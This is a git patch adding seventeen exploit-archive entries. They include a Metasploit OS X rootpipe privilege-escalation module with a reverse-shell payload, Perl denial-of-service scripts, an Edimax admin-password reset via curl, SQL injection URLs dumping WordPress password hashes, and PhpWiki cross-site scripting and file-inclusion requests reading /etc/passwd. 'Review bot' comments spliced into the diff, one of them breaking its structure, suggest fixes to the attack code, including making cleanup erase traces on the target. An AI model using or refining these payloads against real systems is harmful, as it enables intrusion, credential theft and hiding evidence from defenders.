From 270dc872cf906f08d0c02070ebb7ceb6dddd0c94 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 1 Sep 2015 05:02:37 +0000
Subject: [PATCH] DB: 2015-09-01 17 new exploits
---
 files.csv | 17 +++
 platforms/hardware/webapps/38029.txt | 46 ++++++
 platforms/hardware/webapps/38034.txt | 48 +++++++
 platforms/ios/dos/38032.pl | 59 ++++++++
 platforms/multiple/dos/38021.pl | 65 +++++++++
 platforms/osx/local/38036.rb | 161 +++++++++++++++++++++
 platforms/php/webapps/38022.txt | 7 +
 platforms/php/webapps/38023.txt | 7 +
 platforms/php/webapps/38024.txt | 17 +++
 platforms/php/webapps/38025.txt | 11 ++
 platforms/php/webapps/38026.txt | 7 +
 platforms/php/webapps/38027.txt | 200 +++++++++++++++++++++++++++
 platforms/php/webapps/38030.php | 38 +++++
 platforms/windows/dos/38028.pl | 58 ++++++++
 platforms/windows/dos/38031.pl | 41 ++++++
 platforms/windows/local/38035.pl | 41 ++++++
 platforms/windows/remote/38003.py | 62 +++++++++
 platforms/windows/remote/38013.py | 57 ++++++++
 18 files changed, 942 insertions(+)
 create mode 100755 platforms/hardware/webapps/38029.txt
 create mode 100755 platforms/hardware/webapps/38034.txt
 create mode 100755 platforms/ios/dos/38032.pl
 create mode 100755 platforms/multiple/dos/38021.pl
 create mode 100755 platforms/osx/local/38036.rb
 create mode 100755 platforms/php/webapps/38022.txt
 create mode 100755 platforms/php/webapps/38023.txt
 create mode 100755 platforms/php/webapps/38024.txt
 create mode 100755 platforms/php/webapps/38025.txt
 create mode 100755 platforms/php/webapps/38026.txt
 create mode 100755 platforms/php/webapps/38027.txt
 create mode 100755 platforms/php/webapps/38030.php
 create mode 100755 platforms/windows/dos/38028.pl
 create mode 100755 platforms/windows/dos/38031.pl
 create mode 100755 platforms/windows/local/38035.pl
 create mode 100755 platforms/windows/remote/38003.py
 create mode 100755 platforms/windows/remote/38013.py
diff --git a/files.csv b/files.csv
index fb221f3c7..32c2ce976 100755
--- a/files.csv
+++ b/files.csv
@@ -34315,6 +34315,7 @@ id,file,description,date,author,platform,type,port
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
 38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
+38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
 38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
@@ -34324,6 +34325,7 @@ id,file,description,date,author,platform,type,port
 38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0
 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
+38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
@@ -34331,3 +34333,18 @@ id,file,description,date,author,platform,type,port
 38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
 38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0
+38021,platforms/multiple/dos/38021.pl,"Media Player Classic <= 1.5 (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0
+38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection Vulnerability",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0
+38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0
+38024,platforms/php/webapps/38024.txt,"WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass Vulnerability",2012-07-19,"Tushar Dalvi",php,webapps,0
+38025,platforms/php/webapps/38025.txt,"Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0
+38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager 'question' Parameter SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0
+38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80
+38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local SEH Buffer Overflow",2015-08-31,"Robbie Corley",windows,dos,0
+38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Auth Bypass",2015-08-31,smash,hardware,webapps,80
+38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0
+38031,platforms/windows/dos/38031.pl,"Microsoft Office 2007 - msxml5.dll Crash PoC",2015-08-31,"Mohammad Reza Espargham",windows,dos,0
+38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service Vulnerability",2015-08-31,"Mohammad Reza Espargham",ios,dos,0
+38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection Vulnerability",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
+38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
+38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,metasploit,osx,local,0
diff --git a/platforms/hardware/webapps/38029.txt b/platforms/hardware/webapps/38029.txt
new file mode 100755
index 000000000..cb522ba6d
--- /dev/null
+++ b/platforms/hardware/webapps/38029.txt
@@ -0,0 +1,46 @@
+# Title: Edimax PS-1206MF - Web Admin Auth Bypass
+# Date: 30.08.15
+# Vendor: edimax.com
+# Firmware version: 4.8.25
+# Author: Smash_
+# Contact: smash [at] devilteam.pl
+
+
+HTTP authorization is not being properly verified while sendind POST requests to .cgi, remote attacker is able to change specific settings or even reset admin password.
+
+By default, it is necessary to know current password in order to change it, but when request will be missing POST anewpass & confpass parameters, admin password will be set to null.
+
+devil@hell:~$ curl -gi http://192.168.0.10/
+HTTP/1.1 401
+Date: Sat, 21 Dec 1996 12:00:00 GMT
+WWW-Authenticate: Basic realm="Default password:1234"
+
+401 Unauthorized - User authentication is required.
+
+Request:
+POST /PrtSet.cgi HTTP/1.1
+Host: 192.168.0.10
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.10/pssystem.htm
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+
+BoxName=MFD55329&anewpass=1234&confpass=1234&PSPORTNAME1=&PSPORTNAME2=&PSPORTNAME3=&save.x=47&save.y=11
+
+Response:
+HTTP/1.1 200 OK
+Date: Sat, 21 Dec 1996 12:00:00 GMT
+Content-type: text/html
+
+Advance Settings
+(...)
+
+
+Following curl request will set admin account with empty password.
+
+PoC:
+devil@hell:~$ curl -XPOST --data "" -s http://192.168.0.10/PrtSet.cgi > /dev/null
\ No newline at end of file
diff --git a/platforms/hardware/webapps/38034.txt b/platforms/hardware/webapps/38034.txt
new file mode 100755
index 000000000..7f7e02fa3
--- /dev/null
+++ b/platforms/hardware/webapps/38034.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Cyberoam : Blind SQL Injection
+# Date: 31/Aug/2015
+# Exploit Author: Dharmendra Kumar Singh
+# Contact: dsingh63@outlook.com
+# Vendor Homepage: http://www.cyberoam.com
+# Software Link: http://www.cyberoam.com/NGFW/
+# Version: CR500iNG-XP - 10.6.2 MR-1
+# Category: Firewall
+
+1. Description
+
+The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database.
+
+The username field is vulnerable to the following types of SQL Injections
+
+a) Boolean-based blind sql injection
+b) Stacked queries
+
+2. Proof of Concept
+
+The data send to the server while logging in through the captive portal is like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
+The query generated in backend server must be something like this
+SELECT password FROM table_name WHERE username = 'cyberuser'
+
+a) Boolean-based blind sql injection
+If a valid username/password combination is known than boolean-based blind sql injection can be done. If username is set to cyberuser' AND 'x'='x , data send will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0"
+And sql query will become
+
+SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x'
+A successfull login message will be received in response in this case. But if username is set to cyberuser' AND 'x'='y than login fail message will be received in response, since x is not equal to y, hence this confirms that username field is vulnerable to boolean-based blind sql injection
+
+b) Stacked queries
+if username is set to cyberuser';SELECT PG_SLEEP(5) -- the resultant sql query will become
+SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- '
+The stacked sql query "SELECT PG_SLEEP(5)" will make the current session’s process sleep until 5 seconds have elapsed. This confirms that Postgresql Server is used and stacked queries can be executed by providing crafted input to username field.
+
+3. Exploit
+
+Since the techniques are blind hence it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit
+sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
+
+4. Solution
+
+The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence by properly sanitizing the data received in GET variable "username", the vulnerability can be patched.
+
+5. Conclusion
+
+The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL Injection and this vulnerability can be exploited by an attacker to compromise the application, access or modify data
\ No newline at end of file
diff --git a/platforms/ios/dos/38032.pl b/platforms/ios/dos/38032.pl
new file mode 100755
index 000000000..c79e38dc2
--- /dev/null
+++ b/platforms/ios/dos/38032.pl
@@ -0,0 +1,59 @@
+#!/usr/bin/perl -w
+#-*- coding: utf-8 -*
+#
+#[+] Title: Viber Non-Printable Characters Handling Denial of Service Vulnerability
+#[+] Product: Viber
+#[+] Vendor: http://www.viber.com/en/
+#[+] SoftWare Link : https://itunes.apple.com/app/viber-free-phone-calls/id382617920?mt=8
+#[+] Vulnerable Version(s): Viber 4.2.0 on IOS 7.1.2
+#
+#
+# Author : Mohammad Reza Espargham
+# Linkedin : https://ir.linkedin.com/in/rezasp
+# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website : www.reza.es
+# Twitter : https://twitter.com/rezesp
+# FaceBook : https://www.facebook.com/mohammadreza.espargham
+
+
+#Source : http://www.securityfocus.com/bid/75217/info
+
+
+# 1.run perl code
+# 2.Copy the perl output text
+# 3.Open Viber Desktop
+# 4.Select Your VICTIM
+# 5.Paste and Message
+# 6.Enjoy
+
+
+use open ':std', ':encoding(UTF-8)';
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+use MIME::Base64;
+
+$ut="M7tktuYbL14T";
+$utd = decode_base64($ut);
+
+$lt="sNiw2KAg2KAg2Ao=";
+$ltd = decode_base64($lt);
+
+$bt="M7tktuYbL14T";
+$btd = decode_base64($bt);
+
+
+$junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9".
+"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9".
+"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9".
+"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9".
+"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9".
+"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9".
+"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9".
+"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9".
+"Aq0Aq1Aq2Aq3Aq4Aq5Aq";
+$tt="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
+"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05";
+
+$buffer = "A"x153; # 100xA
+$buffer1 = "A"x63; #5xA
+print "\n\n$utd$buffer$ltd$tt$buffer1$junk$btd\n\n";
+#END <3
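Review bot: The trailing comments on the two padding lines are wrong: `$buffer = "A"x153; # 100xA` repeats 153 times and `$buffer1 = "A"x63; #5xA` repeats 63, so anyone sizing the message from the comments gets the wrong numbers; I would change them to `# 153 x "A"` and `# 63 x "A"`. `$ut` and `$bt` hold the same base64 string and are decoded separately, so one variable would do. None of the decoded blobs or the `$tt` byte string has a comment saying what it contains, which leaves a reader who wants to recognise this message pattern nothing to go on short of decoding it; a one-line comment above each would fix that.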
diff --git a/platforms/multiple/dos/38021.pl b/platforms/multiple/dos/38021.pl
new file mode 100755
index 000000000..6bde26515
--- /dev/null
+++ b/platforms/multiple/dos/38021.pl
@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/56567/info
+
+Media Player Classic WebServer is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability.
+
+An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+#!/usr/bin/perl
+use IO::Socket::INET;
+use Getopt::Std;
+use Socket;
+my $SOCKET = "";
+$loop = 1000;
+$ip = $ARGV[0];
+$port = $ARGV[1];
+if (! defined $ARGV[0])
+{
+print "\t*=============================================================*\n";
+print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
+print "\t* --- By : X-Cisadane ---*\n";
+print "\t* --- ------------------------------------------------ ---*\n";
+print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
+print "\t* --- ---*\n";
+print "\t*=============================================================*\n";
+print "\n";
+print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
+print "Default Port for MPC Web Server is 13579\n";
+
+exit;
+}
+
+print "\t*=============================================================*\n";
+print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
+print "\t* --- By : X-Cisadane ---*\n";
+print "\t* --- ------------------------------------------------ ---*\n";
+print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
+print "\t* --- ---*\n";
+print "\t*=============================================================*\n";
+print "\n";
+print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
+print "Default Port for MPC Web Server is 13579\n";
+print "\n";
+print " Please Wait Till The Buffer is Done\n";
+my $b1 = "\x41" x 100000000;
+
+$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
+$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
+$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";
+
+print "\n";
+print " Attacking the Target, Please Wait Till Pwned \n";
+
+for ($j=1;$j<$loop;$j++) {
+socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
+connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
+
+$DoS=IO::Socket::INET->new("$ip:$port") or die;
+send(SOCKET,$b1, 0) || die "failure sent: $!\n";
+
+print $DoS "stor $b1\n";
+print $DoS "QUIT\n";
+
+close $DoS;
+close SOCKET;
+}
+# exit :
diff --git a/platforms/osx/local/38036.rb b/platforms/osx/local/38036.rb
new file mode 100755
index 000000000..54ba903dd
--- /dev/null
+++ b/platforms/osx/local/38036.rb
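Review bot: The `die` text on the `sockaddr_in` line names the wrong call: `$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";` looks copied from the `getprotobyname` line below it, so a failure there is misreported; it should read `die "sockaddr_in: $!\n"`. `use Getopt::Std;` and `my $SOCKET = "";` are never used in this file and can go. The banner block is printed twice verbatim, once in the usage branch and once after it, and would be clearer as a single sub called from both places.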
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+ Rank = GreatRanking
+
+ include Msf::Post::OSX::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the rootpipe vulnerability and bypasses Apple's initial
+ fix for the issue by injecting code into a process with the 'admin.writeconfig'
+ entitlement.
+ },
+ 'Author' => [
+ 'Emil Kvarnhammar', # Vulnerability discovery and PoC
+ 'joev' # Copy/paste monkey
+ ],
+ 'References' => [
+ ['CVE', '2015-3673'],
+ ['URL', 'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
+ ],
+ 'DisclosureDate' => 'Jul 1 2015',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'SessionTypes' => ['shell'],
+ 'Privileged' => true,
+ 'Targets' => [
+ ['Mac OS X 10.9-10.10.3', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
+ 'PrependSetreuid' => true
+ }
+ ))
+
+ register_options([
+ OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
+ ])
+ end
+
+ def check
+ if ver? && admin?
+ vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ print_status("Copying Directory Utility.app to #{new_app}")
+ cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
+ cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
+
+ print_status("Writing bundle plist to `#{plist_file}'")
+ write_file(plist_file, plist)
+
+ print_status("Writing payload to `#{payload_file}'")
+ write_file(payload_file, binary_payload)
+ register_file_for_cleanup(payload_file)
+
+ print_status("Writing malicious shared library to `#{exploit_file}'")
+ write_file(exploit_file, plugin_exploit)
+
+ print_status("Running Directory Utility.app")
+ cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
+
+ print_status("Deleting Directory Utility.app")
+ cmd_exec('rm -Rf "#{new_app}"')
+
+ print_status('Executing payload...')
+ cmd_exec("/bin/sh -c '#{root_file} &'")
+ end
+
+ def ver?
+ Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+ Gem::Version.new('10.9'), Gem::Version.new('10.10.3')
+ )
+ end
+
+ def admin?
+ cmd_exec('groups | grep -wq admin && echo true') == 'true'
+ end
+
+ def sploit
+ "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
+ end
+
+ def plugin_exploit
+ File.read(File.join(
+ Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
+ ))
+ end
+
+ def binary_payload
+ Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+ end
+
+ def exploit_file
+ "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
+ end
+
+ def plist_file
+ "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
+ end
+
+ def new_app
+ @app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app"
+ end
+
+ def plist
+ %Q|
+
+
+
+ CFBundleGetInfoString
+ RootpipeBundle
+ CFBundleExecutable
+ RootpipeBundle
+ CFBundleIdentifier
+ com.root.pipe
+ CFBundleName
+ RootpipeBundle
+ CFBundleShortVersionString
+ 0.01
+ CFBundleInfoDictionaryVersion
+ 6.0
+ CFBundlePackageType
+ APPL
+ IFMajorVersion
+ 0
+ IFMinorVersion
+ 1
+
+
+ |
+ end
+
+ def payload_file
+ @payload_file ||=
+ "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
+ end
+
+ def root_file
+ @root_file ||=
+ "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/38022.txt b/platforms/php/webapps/38022.txt
new file mode 100755
index 000000000..ad782b81e
--- /dev/null
+++ b/platforms/php/webapps/38022.txt
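Review bot: The cleanup step in `exploit` cannot work as written: `cmd_exec('rm -Rf "#{new_app}"')` is a single-quoted Ruby string, so `#{new_app}` reaches the shell literally and the copied Directory Utility bundle with its added plugin stays behind under WRITABLEDIR on the assessed host. A double-quoted Ruby string, `cmd_exec("rm -Rf '#{new_app}'")`, matching the quoting of the `cp -R` line above it, would remove the copy. `check` returns `Exploit::CheckCode::Vulnerable` from a version range and group membership alone; since nothing is actually probed, `Exploit::CheckCode::Appears` is the more accurate result to report. `sploit` reads `datastore['PYTHON']`, an option this module never registers, and nothing in the file calls it, so it can be deleted.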
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56568/info
+
+The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users--
\ No newline at end of file
diff --git a/platforms/php/webapps/38023.txt b/platforms/php/webapps/38023.txt
new file mode 100755
index 000000000..4e4191908
--- /dev/null
+++ b/platforms/php/webapps/38023.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56569/info
+
+The Tagged Albums plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql]
\ No newline at end of file
diff --git a/platforms/php/webapps/38024.txt b/platforms/php/webapps/38024.txt
new file mode 100755
index 000000000..5df34c3b8
--- /dev/null
+++ b/platforms/php/webapps/38024.txt
@@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/56570/info + +WebKit is prone to a security-bypass vulnerability. + +An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. + +Code in test.jsp: + +Test Page + + +Example URI: + +http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1 \ No newline at end of file diff --git a/platforms/php/webapps/38025.txt b/platforms/php/webapps/38025.txt new file mode 100755 index 000000000..5ee896c9f --- /dev/null +++ b/platforms/php/webapps/38025.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/56575/info + +Omni-Secure is prone to multiple file-disclosure vulnerabilities. + +An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks. + +Versions Omni-Secure 5, 6 and 7 are vulnerable. + +http://www.example.co/mpath/lib/browsefiles.php?dir=/ + +http://www.example.co/mpath/lib/browsefolders.php?dir=/ \ No newline at end of file diff --git a/platforms/php/webapps/38026.txt b/platforms/php/webapps/38026.txt new file mode 100755 index 000000000..c91eff35c --- /dev/null +++ b/platforms/php/webapps/38026.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/56576/info + +Friends in War The FAQ Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5-- \ No newline at end of file diff --git a/platforms/php/webapps/38027.txt b/platforms/php/webapps/38027.txt new file mode 100755 index 000000000..76a0454b0 
--- /dev/null
+++ b/platforms/php/webapps/38027.txt
@@ -0,0 +1,200 @@ +# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion +# Date: 29.08.15 +# Vendor: sourceforge.net/projects/phpwiki/ +# Affected versions: => 1.5.4 (current) +# Tested on: Apache2.2 / PHP5 / Deb32 +# Author: Smash_ +# Contact: smash [at] devilteam.pl + + +1/ Cross Site Scripting + +Cross-site scripting vulnerability in user preferences allows remote unauthenticated users to inject arbitrary web script by injecting code via GET or POST 'pagename' parameter. + +Example url: +http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!-- + +Example request: +POST /phpwiki/index.php/UserPreferences HTTP/1.1 +Host: 192.168.0.10 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 260 + +pref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse + +Example response: +HTTP/1.1 200 OK +Date: Sat, 29 Aug 2015 21:30:47 GMT +Server: Apache/2.2.22 (Debian) +X-Powered-By: PHP/5.4.41-0+deb7u1 +Vary: Accept-Encoding +Content-Length: 16114 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html +(...) + + + +(...) + + +2/ Local File Inclusion + +Directory traversal vulnerability in file load section allows authenticated attackers to read arbitrary files via POST or GET 'source' parameter. Content of file will be later available in created page. 
+ +Example url: +http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group + +#1 - Example request: +POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1 +Host: 192.168.0.10 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration +Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 76 + +action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd + +#1 - Example response: +HTTP/1.1 200 OK +Date: Sat, 29 Aug 2015 22:09:36 GMT +Server: Apache/2.2.22 (Debian) +X-Powered-By: PHP/5.4.41-0+deb7u1 +Vary: Accept-Encoding +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html +Content-Length: 3534 +(...) + +

